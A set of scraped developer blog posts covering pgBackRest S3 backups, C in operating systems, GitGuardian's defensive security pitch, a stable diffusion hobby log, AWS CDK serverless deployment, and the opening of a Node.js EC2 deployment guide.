1,564,697 | pgBackRest: PostgreSQL S3 backups | This tutorial explains how to backup PostgreSQL database using pgBackRest and S3. ... | 0 | 2023-08-10T11:48:37 | https://bun.uptrace.dev/postgres/pgbackrest-s3-backups.html | postgres, s3 | This tutorial explains how to backup PostgreSQL database using [pgBackRest](https://pgbackrest.org/) and S3.
## Introduction
pgBackRest is a modern PostgreSQL Backup & Restore solution that has all the features you may ever need:
- Parallel backup and restore.
- Full, differential, and incremental backups.
- Delta restore.
- ZSTD compression.
- Encryption.
- And [many more](https://pgbackrest.org/).
## Installation
Ubuntu provides pre-compiled packages for pgbackrest:
```shell
sudo apt install pgbackrest
```
## Terms
**Stanza** is a pgBackRest configuration for a PostgreSQL database cluster. Most db servers only have one db cluster and therefore one stanza.
**Repository** is where pgBackRest stores backups and archives WAL segments.
## Configuration
Let's create a basic directory structure for configs and logs:
```shell
mkdir -m 770 /var/log/pgbackrest
chown postgres:postgres /var/log/pgbackrest
mkdir /etc/pgbackrest
```
And save the following config in `/etc/pgbackrest/pgbackrest.conf`:
```shell
[demo]
pg1-path=/var/lib/postgresql/14/main
[global]
repo1-retention-full=3 # keep last 3 backups
repo1-type=s3
repo1-path=/s3-path
repo1-s3-region=us-east-1
repo1-s3-endpoint=s3.amazonaws.com
repo1-s3-bucket=s3_bucket_name
repo1-s3-key=$AWS_ACCESS_KEY
repo1-s3-key-secret=$AWS_SECRET_KEY
# Force a checkpoint to start backup immediately.
start-fast=y
# Use delta restore.
delta=y
# Enable ZSTD compression.
compress-type=zst
compress-level=6
log-level-console=info
log-level-file=debug
```
For [point-in-time recovery](https://www.postgresql.org/docs/current/continuous-archiving.html), you also need to configure PostgreSQL to upload WAL files to S3:
```shell
archive_mode = on
archive_command = 'pgbackrest --stanza=demo archive-push %p'
archive_timeout = 300
```
## Full backup
Full backup copies all files in a database cluster.
```shell
sudo -u postgres pgbackrest --type=full --stanza=demo backup
```
## Differential backup
Differential backup only copies files that have changed since the last full backup. It is smaller than a full backup, but to restore it you will need the base full backup.
```shell
sudo -u postgres pgbackrest --type=diff --stanza=demo backup
```
## Incremental backup
Incremental backup only copies files that have changed since the last backup (full, differential, or incremental). It is smaller than a full or differential backup, but to restore it you will need all dependant backups.
```shell
sudo -u postgres pgbackrest --type=incr --stanza=demo backup
```
## Backup restore
To restore the cluster from the last backup:
```shell
sudo -u postgres pgbackrest --stanza=demo --delta restore
```
To view all available backups:
```shell
sudo -u postgres pgbackrest --stanza=demo info
```
## PostgreSQL monitoring
To [monitor PostgreSQL](https://uptrace.dev/blog/postgresql-monitoring-tools.html), you can use [OpenTelemetry PostgreSQL](https://uptrace.dev/get/monitor/opentelemetry-postgresql.html) receiver that comes with OpenTelemetry Collector.
[OpenTelemetry Collector](https://uptrace.dev/opentelemetry/collector.html) is designed to collect, process, and export telemetry data from multiple sources. It acts as a centralized and flexible data pipeline that simplifies the management of telemetry data in distributed systems.
Uptrace is a [OpenTelemetry backend](https://uptrace.dev/blog/opentelemetry-backend.html) that supports distributed tracing, metrics, and logs. You can use it to monitor applications and troubleshoot issues.

Uptrace comes with an intuitive query builder, rich dashboards, alerting rules with notifications, and integrations for most languages and frameworks.
Uptrace can process billions of spans and metrics on a single server and allows you to monitor your applications at 10x lower cost.
In just a few minutes, you can try Uptrace by visiting the [cloud demo](https://app.uptrace.dev/play) (no login required) or running it locally with [Docker](https://github.com/uptrace/uptrace/tree/master/example/docker). The source code is available on [GitHub](https://github.com/uptrace/uptrace).
## Conclusion
pgBackRest is a reliable backup tool that requires miminum configuration. To achieve a good balance between backup size and restoration time, you can create a full backup weekly and a differential/incremental backup daily.
- [OpenTelemetry Architecture](https://uptrace.dev/opentelemetry/architecture.html)
- [Jaeger Alternatives](https://uptrace.dev/blog/jaeger-alternatives.html)
| vmihailenco |
1,573,571 | The Relevance of C in Building Efficient Operating Systems | Harnessing C’s Power: The Unrivaled Choice for Operating System Development ... | 0 | 2023-08-20T00:05:34 | https://dev.to/eztosin/the-relevance-of-c-in-building-efficient-operating-systems-995 | c | ## Harnessing C’s Power: The Unrivaled Choice for Operating System Development
## Introduction
The creation of a simple, yet powerful tool remains one of the most remarkable innovations the world has ever beheld. This innovation carries the weight of the computing world, revolutionizing how we interact with machines. The C programming language stands as a cornerstone, closely connected to machine language, which empowers developers to explore and manipulate computer systems to change the scope of the world of technology.
As the successor to a previous programming language called B, C was developed in the 1970s by Dennis Ritchie at Bell Laboratories in the USA. It quickly became a cornerstone in the computing world due to its closeness to machine language, empowering developers to explore and manipulate computer systems with unparalleled precision.
In this article, we delve into C's unparalleled relevance and the multitude of benefits it offers. We aim to establish why it deserves its place as the preferred choice for developing operating systems.
## Prerequisites
Before delving into the insights offered in this article, it's recommended that readers possess a fundamental understanding of computer hardware and software concepts. This foundational knowledge will greatly enhance the exploration of the myriad benefits associated with learning the C programming language. Whether you're a novice in the programming world or a seasoned professional versed in other languages, this article will shed light on why C holds a unique place in the realm of programming.
## The Technological Advancement of C
Originally, C was developed to improve the functions of the Unix operating system (an operating system that acts as a link between the computer and the user). Several renowned scientists made significant improvements to the C library and preprocessor (a step in the compilation process), including Alan Snyder, Mike Lesk, and John Reiser. As a result, C was used to develop version 4 of the Unix operating system in November 1973.
During the 1980s, C gained popularity, and the book “The C programming language” was well-known before the official recognition of C by the American National Standards Institute(ANSI). C compilers that translate program code to machine code (represented as 0’s and 1’s) became available for all modern computer architectures, leading to widespread distribution among governmental and academic bodies.
Since its development, many languages have been structured and syntactically influenced by C’s design. C has firmly established its place for decades in the programming world consistently ranked as one of the top two languages in the TIOBE index, which measures the popularity of programming languages.
## Unveiling C’s Relevance in Operating Systems
Have you ever wondered how your computer or smartphones operate behind the scenes? One of the key players in making these systems efficient and powerful is the C programming language.
C is a language that gives developers a direct and powerful way to interact with the computer’s hardware. This unique ability allows C to efficiently control and utilize computer resources, making it an excellent choice for building operating systems that run smoothly and respond quickly.
Let’s take a moment to understand what “kernel capabilities” mean. The kernel is like the brain of an operating system, handling essential tasks such as managing memory, scheduling processes, and handling input/output. C’s kernel capabilities make it possible for developers to create a solid foundation for operating systems, ensuring they work seamlessly with the hardware.
But what does all this technical jargon really mean? Let’s break it down further! Imagine you’re building a house, and C is like having a magic tool that lets you shape every tiny detail of the structure. It allows developers to create functions and features that fit perfectly into the operating system, like customizing your dream home with all the features you want.
And the best part is, C is not only powerful but also portable. That means the programs you write in C can run on different types of computers without much change to your program. So, whether you’re using a Windows PC, a Mac, or a smartphone, C’s portability makes it adaptable to various systems.
You might wonder, “Who uses C for their operating systems?” Well, some of the biggest tech giants, like Microsoft, Apple, and Google, rely on C to build the core of their operating systems. This showcases C’s reliability and popularity in the tech industry.
## The Power of C’s low-level access
The key to building an efficient operating system lies in the ability of a programming language to manipulate the hardware of the computer and handle certain critical aspects. C programming excels in handling these critical aspects namely:
**Memory Management**: Operating systems need to efficiently manage the computer’s memory to ensure smooth program execution and prevent conflicts. C’s direct memory allocation and deallocation access, manipulation capabilities make it well-suited for effective memory management in operating systems.
**Process Scheduling**: In a multitasking environment, the operating system must efficiently manage processes, allocate resources, and ensure fair execution. C’s versatility allows developers to implement robust process scheduling algorithms.
**File Systems**: Handling data storage and retrieval is crucial for any operating system. C’s capability to interact directly with hardware enables the development of efficient file systems, ensuring quick and reliable data access.
**Interacting with Hardware**: As the heart of an operating system, C”s ability to interact directly with hardware allows developers to control low-level operations.
**Simplicity and Versatility**: C’s simplicity and versatility make it an ideal choice for managing complex algorithms and data structures with concise code, streamlining the operating system development process.
**Maturity and Stability**: With many additions to the C standard library over the years, C still remains an outstanding and reliable programming language. As a result tech giants rely heavily on building technical systems using the C language
## C’s Role in Embedded Systems
An embedded system refers to a combination of computer hardware and software designed to perform specific tasks. With C’s ability to interact with the hardware and boost the functionality of devices, C has been incorporated to ease human life. Examples of these cases include its use in industrial machines, household electronics, automobiles, medical equipment, and more.
## Enduring Legacy in the Programming Landscape
C continues to be a widely used and respected programming language among developers worldwide. Academic bodies and various computer science programs have continued to incorporate C in their curriculum, as many find it easier to transition to other programming languages after having a strong foundational background in C.
In addition to its position as a fundamental language for beginners, C remains a top choice for developers worldwide due to its inherent advantages. Its portability allows programs written in C to run on different platforms with little or no modifications. Moreover, its efficiency, reliability, and versatility have cemented its place in technological innovations.
## Challenges and Future Prospects
While C has served as the foundation for numerous programming languages and remains the father of languages, it is imperative for programmers to acknowledge its limitations and explore how C may evolve or adapt to meet the changing needs of the evolving technology landscape. The programming community needs to work towards addressing these limitations and continuously improving C’s capabilities.
## Conclusion
Having explored the remarkable journey of C from its development by Dennis Ritchie in 1972 to its continuous significance in modern computer architectures, C has undoubtedly made its mark in the computing field.
Throughout our journey, we delved into C’s unique, low-level capabilities that make it stand out from other programming languages, its access to memory allocation and deallocation which gives programmers absolute control to utilize and have access to sufficient memory making it an ideal choice to build technical software and operating systems, its kernel capabilities laid the foundation for a robust operating system, which empowered developers to build software applications that run smoothly on a wide range of devices.
As we steer into the future of the constantly evolving world of technology, C’s strength and adaptability have positioned it as a critical language for developing efficient and portable innovations. Its versatility and reliability will continue to be sought after for a long period of time.
In conclusion, the path of C programming has been inspiring for ages, from its creation to its current status as a dominant force in the programming world. C has proven to be more than just a tool, impacting the lives of developers and users alike, it has become a legend of languages haha.
As we embrace the future, let us continue to remember the power of simplicity and efficiency that C brings, propelling us forward into an ever-evolving world of technological innovation. With C on our side, we can continue to boast of reliability and stability in shaping the destiny of technology itself.
## References
1. C (programming language). (2023, July 30). In Wikipedia. https://en.wikipedia.org/wiki/C_(programming_language)
2. Lutkevich, B. (n.d.). Embedded System. TechTarget. https://www.techtarget.com/iotagenda/definition/embedded-system
3. Cognetta, S. (2023, July 26). How to Make a Computer Operating System. Wikihow. https://www.wikihow.com/Make-a-Computer-Operating-System
| eztosin |
1,600,637 | Defending your castle: Raising walls versus detecting intruders | When defending your digital assets in 2023, building a moat and a drawbridge might not be the first... | 0 | 2023-09-14T20:28:43 | https://blog.gitguardian.com/defending-your-castle-raising-walls-versus-detecting-intruders/ | cybersecurity, breach, defense, security | When defending your digital assets in 2023, building a moat and a drawbridge might not be the first thing you think about. You probably wouldn't base your defensive posture on tech like trap doors or guard towers. However, there is a reason these methods have been employed for hundreds of years; they worked, at least when what you were guarding was rooms full of gold or [holy grails](https://blog.gitguardian.com/honeytokens-protect-your-holy-grail/).
[](https://lh5.googleusercontent.com/8Fqlo8zimPT3xOgQebkj0g0yhug1gQzz0U_7jN9rQ7000V8MgPtQF_eHrZ1sZhQSwjkZSS3vLD6p4U75UPiGeXpdZodMq2WiEGpGAdLJTzwxJnKeQo6tEZSU-mB1rDOBPHbqf8oc1l-qUKteyFmpKg)
When they built [ENIAC, the world's first general-use computer](https://www.britannica.com/technology/ENIAC?ref=blog.gitguardian.com#:~:text=Last%20Updated%3A%20Aug%209%2C%202023,John%20Mauchly%2C%20American%20engineer%20J.), in the 1940s, the security strategy was similar to what the Sumerians had devised nearly 6,000 years earlier, basically armed guards defending a locked room. Of course, this made sense as you had to be in the same building to access that room-sized computer, which took as much power as a small city to operate.
Since then, things have changed quite a bit. We have transitioned from a centrally managed workforce, all gathering in a physical office, to a remote and hybrid workforce, with employees accessing sensitive data from various locations and devices. Unsecured Wi-Fi networks, personal devices, and potential exposure to phishing attacks took focus for our security teams. The castle's walls expanded to include home offices, coffee shops, and airports. Defending against such threats became more complex, requiring solutions that go beyond traditional perimeter-based security.
Organizations also shifted from completely owned, on-premise data centers and networks into cloud services and relying on third-party vendors. Digital assets now reside in an ever-diversifying set of services. Protecting our assets in an ever-expanding 'kingdom' of smaller castles of external services we don't own brought a whole new world of challenges.
The world has shifted, and the job of the security professional has forever changed from keeping people out to being able to detect when the wrong persons get in.
Some classical defenses still make sense
----------------------------------------
While it is silly to think of a stone barrier protecting our applications, we do build certain types of walls, Web Application Firewalls, WAFs. While not foolproof, they prevent the most basic types of attacks from granting access. Hardening those WAF rules as new vulnerabilities are revealed is not really that different than reinforcing the castle wall as the enemy devises new battlefield tech.
While a guard tower and drawbridge over a moat might seem like a terrible way to deal with authentication in your production environments, this is the role we see tools like multifactor authentication, MFA, and token-based passwordless systems play. "Who goes there?" is not something someone needs to say out loud, as our digital gatekeepers, like[ OAuth](https://oauth.net/?ref=blog.gitguardian.com)-based solutions, say it for us, only lowering the drawbridge once we verify we are who we say we are.
It is still very practical to use a vault to guard your secrets. Today, instead of iron boxes with complex locking mechanisms, we rely on encryption-based solutions like [Vault by HashiCorp](https://www.vaultproject.io/?ref=blog.gitguardian.com), [Doppler](https://www.doppler.com/?ref=blog.gitguardian.com), or [Akeyless](https://www.akeyless.io/?ref=blog.gitguardian.com) to hold our dearest secrets: our credentials.
Modern problems require modern solutions
----------------------------------------
While some [legendary assassins](https://en.wikipedia.org/wiki/Assassin%27s_Creed?ref=blog.gitguardian.com) and thieves could get into strongholds, they were not allowed to ransack the place without someone immediately noticing. Unfortunately, this is exactly what malicious actors are doing these days: sneaking in through doors we leave open and laterally expanding their footprint as rapidly as possible. While overall [dwell times are much lower](https://news.sophos.com/en-us/2023/08/23/active-adversary-for-tech-leaders/?ref=blog.gitguardian.com#:~:text=average.%20In%20the-,first%20half%20of%202023,-%2C%20the%20median%20dwell) today than they were even a few years ago, the fact remains that they are still getting in at alarming rates and, on average, are spending days doing whatever they please before we even detect them being there.
Good news: GitGuardian is here to help ensure you are not leaving those doors open and that those attackers will quickly give themselves away. We focus on helping organizations secure the modern way of building software with our code security solutions, as we will highlight below.
### Keeping the doors shut
Attackers can bypass our current defenses by [leveraging misconfigurations in our infrastructure as Code](https://blog.gitguardian.com/researcher-finds-github-admin-credentials-thanks-to-misconfigurations/), IaC. Unlike castles, which take years to build in some cases and would require many eyes to find defects in materials and design, IaC deployments can be done in minutes and at extreme scale by a single DevOps professional. The nature of IaC means the configuration is likely to be reused over and over again, perhaps hundreds or thousands of times, greatly increasing the potential attack surface. The likelihood that a flaw or misconfiguration sneaks past that single person will never be zero. They need tools to help ensure success.
Helping to ensure common security issues don't make it to production is why we built [Infra as Code Security](https://www.gitguardian.com/infrastructure-as-code?ref=blog.gitguardian.com) into the GitGuardian platform. Now GitGuardian users can leverage both ggshield to manually scan for over 100 common IaC misconfigurations at the local developer level and Infra as Code Security to automatically scan for any of those same issues in code committed to GitHub and GitLab repositories in your perimeter.
We focus on scanning IaC templates like Terraform and CloudFormation for misconfigurations affecting your AWS, Azure, GCP services, Kubernetes clusters, and Docker containers, safeguarding your deployments.
### Bait the traps
Once an attacker is inside, you want them to immediately announce they are inside, preferably over Slack. This does happen occasionally; just[ ask Uber](https://blog.gitguardian.com/uber-breach-2022/). Most of the time, attackers go out of their way to hide their presence. Most attacks follow a similar pattern though, which we can leverage to our advantage. First, they breach to gain an initial foothold, mainly through[ phishing attempts or stolen credentials](https://blog.gitguardian.com/verizon-2023-dbir-credential-leaks/), and then try to expand as fast as possible laterally. They do this by finding any and all credentials left in plaintext throughout the system. From within any system they can access, the attacker will attempt to escalate privileges and then keep moving laterally, sometimes planting malware and sometimes exfiltrating data, sometimes doing both.
Knowing they will look for any credentials to exploit means they will likely also try to use any decoy credentials you leave lying around. This is where [GitGuardian Honeytoken ](https://www.gitguardian.com/honeytoken?ref=blog.gitguardian.com)comes in. You can easily create AWS credentials that do not allow any real access to systems or data but instead send you alerts by email or via webhooks that let you know someone is lurking about. Getting their IP address, user agent, what actions they were attempting, and the timestamps of each attempt will help you boot them from the system.
### Clean up any and all real keys around your stronghold
While honeytokens make it easy to deploy decoy credentials, ideally, those would be the only real secrets that any attacker finds. GitGuardian has long been known for our legendary [Secrets Detection](https://www.gitguardian.com/monitor-internal-repositories-for-secrets?ref=blog.gitguardian.com) abilities. No matter how many repos you have or how many developers are in your org, GitGuardian can quickly identify any and all instances of secrets in plaintext throughout your codebase, no matter where it is in the software development lifecycle.
Using [ggshield, you can even stop hardcoded credentials](https://blog.gitguardian.com/how-to-use-ggshield-to-avoid-hardcoded-secrets-cheat-sheet-included/) from ever making it into a commit. And for any incidents where those secrets do make it into your shared repositories, the GitGuardian dashboard makes it very simple to identify the issue and [keep track of the remediation process](https://docs.gitguardian.com/internal-repositories-monitoring/remediate/remediate-incidents?ref=blog.gitguardian.com#collect-the-feedback). Make sure that you are making it as hard as possible for attackers to gain further access when they do make it inside your castle walls.
We must prepare for the breach
------------------------------
Building walls and moats in the form of WAFs and Zero Trust architecture is still important when defending your organization. We can't rely on those tactics alone anymore. The reality is we need to adopt an ["assumed breach" posture](https://blog.marcolancini.it/2021/blog-cloud-security-roadmap/?ref=blog.gitguardian.com). Modern security means reacting so quickly that attackers are left wondering what they could possibly try next. Malicious actors do not have unlimited time or resources; every time we stop their attempts at infiltration, it is one more round won for the good guys.
Make sure you are prepared for modern attacks. Close any doors you might leave open through IaC misconfiguration by scanning early and often. Lay out traps in the form of honeytokens to trick attackers into giving away their position. Make sure those decoy credentials are the only plaintext secrets they find by using GitGuardian Secrets Detection to discover and eliminate any real keys, certificates, or passwords.
No matter what your castle looks like or what treasures you guard, make sure you leverage the power of modern tools to keep your kingdom secure. | dwayne_mcdaniel |
1,633,742 | Expedition logbook: Journey into the world of stable diffusion | This will be a summarization on a high level of my experience and some related learnings from a hobby... | 0 | 2023-11-03T16:56:18 | https://dev.to/charliefoxtrot/expedition-logbook-journey-into-the-world-of-stable-diffusion-104n | writing, learning, stablediffusion, showdev | This will be a summarization on a high level of my experience and some related learnings from a hobby project trying to generate images with stable diffusion in the cloud.
## Intro: Preface & vision
I had previously played around a bit with generating images using Dall-E 2 and similar solutions using some free credits. My problem was this; I kept forgetting to use my free credits and thus not getting them renewed. And when I finally wanted to generate an image I ran out of credits after a few tries.
The initial idea was simply to set up a scheduled generation of images that would make sure to consume all of my free points in the various offerings available and to then automatically push them to some kind of screen or digital photo frame.
The primary images I wanted to generate would be
As I eventually got started on the project I realised that the free offerings of the various resources have been cancelled. Thus I decided to set up my own image generation using open source solutions with the goal of having it live in the cloud to make it simpler to share and to avoid needing specific local resources.
## Chapter 1: Generating images
As stated in the preface; as a lazy (efficient) developer I started my journey of finding a open source implementation of one of the Image generation models, and ended up with [Stabilityi-AI's Stable Diffusion setup](https://github.com/Stability-AI/stablediffusion)
After fighting my Windows installation getting all the python packages, conda installations etc. running I was finally able to generate an image.

Well, that did not go great. So I kept trying making more images; altering the prompt and the configurations. All of my attempts turned out similar; but why?
To keep runtime low I tried generating images of 256x256 ratio. I tried altering the prompt, the steps (iterations) as well as CFG scale (multiplier of how much the prompt input should dictate the outcome).
But it just turned into different noise; still no images that looked anything like the prompt.
To ensure that my setup wasn't faulty I took a step back and tried some reference prompts and seeds and managed to generate images that looked like the prompt rather than random colourful noise.

### 1.1 What went wrong?
My primary problem was simply that I did not understand how diffusion models work well and what might be a good expected prompt (including config) to generate images.
A simplified explanation is that (image) diffusion models are trained on a specific set of images in order to learn how to remove noise from an image in order to get closer to the original image it trained on.
This means that a model can not generate outputs (in a controlled fashion) it's not trained on. This includes the ratio as it's part of the noise removal. Other ratios might still end up looking good; but it might also cause unexpected corruptions
Thus in hindsight I realise that I had to low of a CFG-scale, to few iterations and an unexpected ratio as this model was trained on 528x528 images.
Moving on from this I got back to trying to generate my original prompts; but now with new ratios, iterations and CFG scale. So what was my prompt? Variations of `Fox working with a laptop in an office drinking a cup of coffee`.With various alterations of phrasing and omitting details. Why this prompt? Well it's simply a reference to my the company I work at Charlie Foxtrot; a software development consultancy with foxes in our branding.
I ended up with images to containing all the contents of the prompt; even if very disjoint and not a combined picture.

I thought this might simply be to hard a prompt for this model. So I changed the prompt again; keeping the fox but altering the rest of the prompt to be a more natural setting for the fox.

Much better. After this I got back to trying various versions of the original prompt with smaller alterations for each prompt.
### 1.2 The end
Then my laptop blue screened. I left it a short while to cool down and then started it up again; but now for some reason my python and conda setup refused to work.
During my setup I obviously fucked up some step which left it in a state that a fresh start of the system were lacking some kind of path var or similar.
Part of the problem is of course that I did not pay enough attention when installing my dependencies and setting up my paths etc.
To avoid this happening again, to be able to share the setup with friends and colleagues as well as my future plan of getting it set up in a cloud solution I decided to get setup in a Docker image instead. In addition to this I decided to look for a more feature complete solution; preferably with an already prepared docker setup.
### 1.3: Giving it another shot
As mentioned I wanted a more feature complete solution with an existing docker setup; and I found it [InvokeAI](https://invoke-ai.github.io/InvokeAI/).
While this probably relates more to my setup and experience; setting this up was a lot smoother compared to my initial setup, I simply had to build the image according to instrucitons and run it. I suddenly was making images with outcomes that looked like my prompt with a provided GUI. When my laptop inevitable blue screened again from being pushed past its limit I recovered in seconds.
But the images took longer to generate than expected and the gpu was hardly working even when I tried to pass through GPU resources. Did this have something to do with InvokeAI, the model or my setup? After verifying the requirements I simplified the setup by using invokeai's simple installer version; removing potential issues with Docker (running via WSL).
I instantly got better performance and thus could figure out that something was not working as intended. With this knowledge I could debug and resolve the issue with the gpu passthrough and get back to my docker setup.
After this I simply dialed in the prompt configuration to find a good balance between output and runtime by testing various combinations of prompts, cfg and steps.
When this was done I tried all of the recommended models from the invokeai installer and tried a few iterations of each to find the model(s) that I thought generated the best images for my given prompt. For some models I had to play around a bit with new baselines for cfg/steps to get images I thought looked good.
I could now generate images in bulk where some of them actually looked as intended.

### 1.4 Learnings
Some simple learnings from this:
- Always work with a recoverable / reproducable environment.
- Understand the tools (models) better when using them. Even when playing around you need to play around in a mindful manner.
- When experimenting always sanity check with a known input/output as soon as possible. It might seem more fun to have the first outcome to be what you want; but you probably want to verify your setup first.
- Image generation is just structured randomization. You will need to generate a lot of images and sort through them either manually or with image analysis to provide outcomes you're happy with. Finetuning input for your model can take a lot of iterations.
- Schedule the time for your input/model testing better than I did; generating images is a resource hog and it will make using the device for anything else at the same time a pain. Alternatively get it set up on a secondary machine asap when you know you have working setup.
## Chapter 2: To the cloud
As I now had a dockerized soloutin that I liked
After finding models and configurations that performed to my liking on my laptop it was now time to get into the cloud. This is for multiple reasons. Amongst others it would allow for scaling above physical local devices, would not bog down said local devices during runtime and in general be better for sharing and demo purposes.
So what's on the shopping list:
- Container Hosting (potential autoscaling)
- Gpu resources for the container
- A storage volume to make outputs, models and invokeai setup stable between instances.
- Keeping costs down
To simplify the decisions I limited myself to the Azure platform as my company already had an existing setup for it.
### 2.1 Container hosting
So lets start with getting the container into the cloud; that's the minimum working solution. Getting something autoscaling would simplify maintenance and in general be resource efficient.
Starting with simple `azure container apps` would allow for azure handled autoscaling and some free resources monthly; which would be nice for a project of this scale. Sadly the maximum memory of azure container apps of 4Gi is way below the required specs for invokeai of 12GB.
I never tried how it would perform on these resources and there is the possibility to request a manual increase of memory limit.
So this is something that could be explored in the future.
Secondly we could explore azures kubernetes setup `aks`.
Sadly on a free tier there is no autoscaling which made me opt out from this option. However neither the standard tier cluster nor the nodes are that expensive and there are a lot of GPU supported options which might be worth trying out in another iteration in the future.
However I opted for a regular container instance. In theory there should also be cost effective K80 GPU's that could be used; however it's a preview feature which is not intended for production use and needs to be manually approved by Azure prior to usage.
Our request got rejected; hence we are running without a GPU in the cloud.
The pricing for our needs is low; 1 cpu and 12 GB memory which totals to ~$2 per day of uptime; and with mindful shutdown of the service we would of course only pay for actually active resources. And even without a gpu we can produce images in a somewhat acceptable time.
In addition to all this we will of course need a registry. This costs $0.167 / day on the basic tier.
### 2.2 Cloud storage volume
Setting up a volume mount for the container seemed pretty simple. All I needed was to set up a `file share` and mount it to my container instance.
Depending on your setup you should only need ~12GB for your models as well as extra storage for caching between steps of the image generation + generated output storage. I could not see storage going above ~25GB with some mindful cleaning of unused data. At this point pretty much any storage option would be cheap; I went for a transaction optimized setup at $0.06 per used GiB and month for the storage + $0.015 per 10000 read/writes. At this price point we should not need to worry at all.
The first few burst tries of starting one docker container; generating one image and then killing everything this worked fine.
I then tried sharing the volume between two different container instances and generated multiple images on both instances.
Sharing a volume worked fine and I thought that was it; I generated a few images each for a few hours straight.
Happy with the performance and results I closed them down for the day.
Next day I sanity checked my cost analysis and realized that for some reason I had an unexpectedly huge storage cost. Turns out that this also induces a network fee for the file transfers; while not immensly large this costed about 90% of the storage cost and even 90% of the entire project at this scale of use.
Thus I decided to cut it from the project to keep costs down.
The only implication from this is that I need to reinitiate the invokeai setup for every container on startup; re-install any models I want to use and ensure to download any outputs I want to keep before shutting it down. For this type of hobby project that's perfectly fine.
When the week was up it was apparent what had happened; azure gave me the finger.

### 2.3 Learnings
So what did I learn this time
- Start any request for potential resource needs way ahead of time; there might be a lot of forth and back and you might eventually get rejected.
- Read pricing details more closely so you understand potential extra costs in your calculations.
- When trying out things do it in iterations and inspect the outcomes after use vigilantly. Had I paid more attention the first few days the spike would have never occured. This time the cost was just high relative to an extremely low baseline; but in any project costs can run amok if you don't pay attention.
## Outro: The outcome and next steps
After all of this I opted to let the iteration 0 frame to be a simple solution, we bought a photo frame with a proprietary application for sharing images.
There are a lot of places to take this project in a second iteration; building a custom photo frame with functionality for automatically pushing new images generated to it, training / extending a model to use the companys mascot and logos rather than generic foxes, a different cloud hosted solution with the same or different provider, using any of the many other features invokeai supports like multistep workflows, or simply replacing invokeai with a different solution. Or maybe this is the final iteration of the project? | malcolmerikssonfoxtrot |
1,634,847 | Build serverless applications with AWS CDK | Serverless computing is becoming an increasingly popular way to develop and deploy applications.... | 0 | 2023-11-23T10:28:00 | https://blog.mikaeels.com/build-serverless-applications-with-aws-cdk | aws, awscdk, cdk, serverless | ---
title: Build serverless applications with AWS CDK
published: true
date: 2023-02-15 15:51:13 UTC
tags: #aws #awscdk #cdk #serverless
canonical_url: https://blog.mikaeels.com/build-serverless-applications-with-aws-cdk
---

Serverless computing is becoming an increasingly popular way to develop and deploy applications. With serverless, developers can focus on writing code and not worry about the underlying infrastructure. AWS Lambda and API Gateway are two popular AWS services used for serverless computing. In this blog post, we will explore how to use AWS CDK to deploy serverless applications using these services.
### **Getting started with AWS CDK**
Before we get into the specifics of building serverless applications, let's start with a brief introduction to AWS CDK. AWS Cloud Development Kit (CDK) is an open-source software development framework for defining cloud infrastructure in code. With AWS CDK, you can define your infrastructure in familiar programming languages such as TypeScript, Python, and Java. AWS CDK uses AWS CloudFormation under the hood, so all of your infrastructure is defined in a CloudFormation stack.
### **Creating a serverless stack**
To create a serverless stack with AWS CDK, we first need to define our resources. In this case, we will be defining an AWS Lambda function and an API Gateway endpoint. Let's start with the Lambda function:
```
import * as cdk from 'aws-cdk-lib';
import * as lambda from 'aws-cdk-lib/aws-lambda';
export class ServerlessStack extends cdk.Stack {
constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
super(scope, id, props);
const myFunction = new lambda.Function(this, 'MyFunction', {
runtime: lambda.Runtime.NODEJS_14_X,
handler: 'index.handler',
code: lambda.Code.fromAsset('path/to/lambda/code'),
});
}
}
```
In this example, we are defining a new Lambda function with the runtime of Node.js 14.x. We are also specifying the location of the code for the function. This code could be located in a local directory or in an S3 bucket.
Next, we will define the API Gateway endpoint:
```
import * as apigw from 'aws-cdk-lib/aws-apigatewayv2';
export class ServerlessStack extends cdk.Stack {
constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
super(scope, id, props);
const myFunction = new lambda.Function(this, 'MyFunction', {
runtime: lambda.Runtime.NODEJS_14_X,
handler: 'index.handler',
code: lambda.Code.fromAsset('path/to/lambda/code'),
});
const api = new apigw.HttpApi(this, 'MyApi');
api.addRoutes({
path: '/',
methods: [apigw.HttpMethod.GET],
integration: new apigw.LambdaProxyIntegration({
handler: myFunction,
}),
});
}
}
```
In this example, we are defining a new HTTP API Gateway endpoint that routes to our Lambda function. We are specifying that this endpoint should respond to GET requests and forward them to our Lambda function.
### **Deploying and testing your serverless application**
Once we have defined our resources, we can deploy our stack using the AWS CDK CLI:
```
cdk deploy
```
This will create the necessary resources in your AWS account. Once the deployment is complete, we can test our API Gateway endpoint by sending an HTTP GET request to the endpoint URL:
```
curl https://api-gateway-url/
```
This should return the output from our Lambda function.
### **Conclusion**
In this blog post, we have seen how to use AWS CDK to define and deploy a serverless stack containing an AWS Lambda function and an API Gateway endpoint. With AWS CDK, you can define your infrastructure in code and easily manage it through version control systems and continuous integration/continuous deployment (CI/CD) pipelines. AWS CDK abstracts away the complexity of CloudFormation and provides an intuitive programming interface that makes it easy to create and manage AWS resources.
With AWS CDK, you can take advantage of the benefits of serverless computing, such as automatic scaling and pay-as-you-go pricing. AWS Lambda and API Gateway are just two of the many serverless services provided by AWS, and with AWS CDK, you can easily create and manage these services alongside other AWS services.
In summary, AWS CDK provides an excellent framework for defining and deploying serverless applications. With its intuitive programming interface and integration with AWS CloudFormation, you can easily manage your serverless infrastructure in code. By using AWS CDK, you can take advantage of the benefits of serverless computing, such as automatic scaling and pay-as-you-go pricing, and build reliable and scalable serverless applications. | mikaeelkhalid |
1,633,756 | From Code to the Cloud: A Step-by-Step Guide to Deploying Your Node.js App on AWS EC2 | Introduction In this article, we will deploy a nodejs express app to ec2. We will also add... | 0 | 2023-10-16T06:04:50 | https://dev.to/drsimplegraffiti/from-code-to-the-cloud-a-step-by-step-guide-to-deploying-your-nodejs-app-on-aws-ec2-4300 | aws, node, beginners, programming |
##### Introduction
In this article, we will deploy a nodejs express app to ec2. We will also add SSL and Nginx in the next article.
**Let's dive in** 
##### Prerequisites
🎯 AWS account
🎯 Github account
🎯 Nodejs installed on your local machine
🎯 Git installed on your local machine
🎯 Basic knowledge of nodejs and express
🎯 Basic knowledge of git
🎯 Basic knowledge of ssh
🎯 Basic knowledge of linux commands
##### ⏭️ Create a Nodejs express app
Run the following commands in your terminal
```bash
mkdir ec2
cd ec2
npm init -y
```

The `-y` flag is to skip the questions and use the default values
##### ⏭️ Install the following packages
```bash
npm install express dotenv
```
✅ Express is a web framework for nodejs
